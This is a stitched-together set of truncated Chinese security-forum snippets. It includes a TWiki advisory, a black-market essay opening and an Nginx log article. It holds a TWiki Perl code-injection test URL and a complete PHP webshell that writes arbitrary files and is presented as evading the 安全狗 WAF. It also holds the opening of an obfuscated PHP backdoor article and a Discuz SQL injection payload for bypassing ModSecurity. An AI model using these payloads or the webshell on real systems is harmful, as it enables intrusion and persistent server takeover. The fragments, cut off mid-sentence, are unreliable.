Remote Perl code execution with query string to debug TWiki plugins

影响版本: * TWiki-6.0.0 (TWikiRelease06x00x00) * TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04) * TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02) * TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02) * TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04) * TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02) * TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05) 测试方法: http://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\r\n\r\nVulnerable!")%3bexit 修复方式: twiki/lib/TWiki/Plugins.pm Patch to sanitize the 'debugenableplugins' parameter: =======( 8>< CUT )=============================================== --- TWiki/Plugins.pm.save1 2014-01-09 02:10:56.000000000 -0500 +++ TWiki/Plugins.pm 2014-10-01 20:30:36.000000000 -0400

浅谈黑产

首先up要说明一下,up只是因为好奇才去了解这个行业的,up不是大黑阔也不是手握无数0day的地下大牛,up只是一名学生狗。说实话up只能模

php绕过安全狗检测的小马分享

php绕过安全狗检测的小马分享 zph | 2014-08-28 15:10 直接上代码: <?php $p=realpath(dirname(__FILE__)."/../").$_POST["a"]; $t=$_POST["b"]; $tt=""; for ($i=0;$i<strlen($t);$i+=2) $tt.=urldecode("%".substr($t,$i,2)); @fwrite(fopen($p,"w"),$tt); echo "success!"; ?> 分析利用&过狗: <?php $p=realpath(dirname(__FILE__)."/../").$_POST["a"]; //定义$p为根目录的物理路径+$_PO

PHP中使用按位取反(~)函数创建后门,编码变异类后门!免杀绕过防火墙

.::PHP中使用按位取反(~)函数创建后门::. We enjoy hacking of life in day and night. _______________________________________________ [+] Author: Evi1m0 <evi1m0.bat#gmail.com> [+] Team: FF0000 TEAM <http://www.ff0000.cc> [+] From: HackerSoul <http://www.hackersoul.com> [+] Create: 2014-02-04 _______________________________________________ -= Main =- 1)PHP ~位运算符 前一段时间

对于一个http请求,如何找里面的安全漏洞,能否自动化完成呢?

对于一个http请求,如何找里面的安全漏洞,能否自动化完成呢? xsser (十根阳具有长短!!) | 2014-06-16 14:25 POST /cpc/incrementPV HTTP/1.1 Host: x.com Content-Length: 48 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://x.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like

Modsecurity 防火墙简单绕过实战

最近在玩dz7.2注入漏洞,遇到一部署modsecurity防火墙站点,表示人品不给力,简单绕过思路如下 获取数据库版本: faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema .tables

纯手工玩转 Nginx 日志

Nginx 日志对于大部分人来说是个未被发掘的宝藏,总结之前做某日志分析系统的经验,和大家分享一下 Nginx 日志的纯手工分析方式。 Nginx 日志相关配置有 2 个地方:a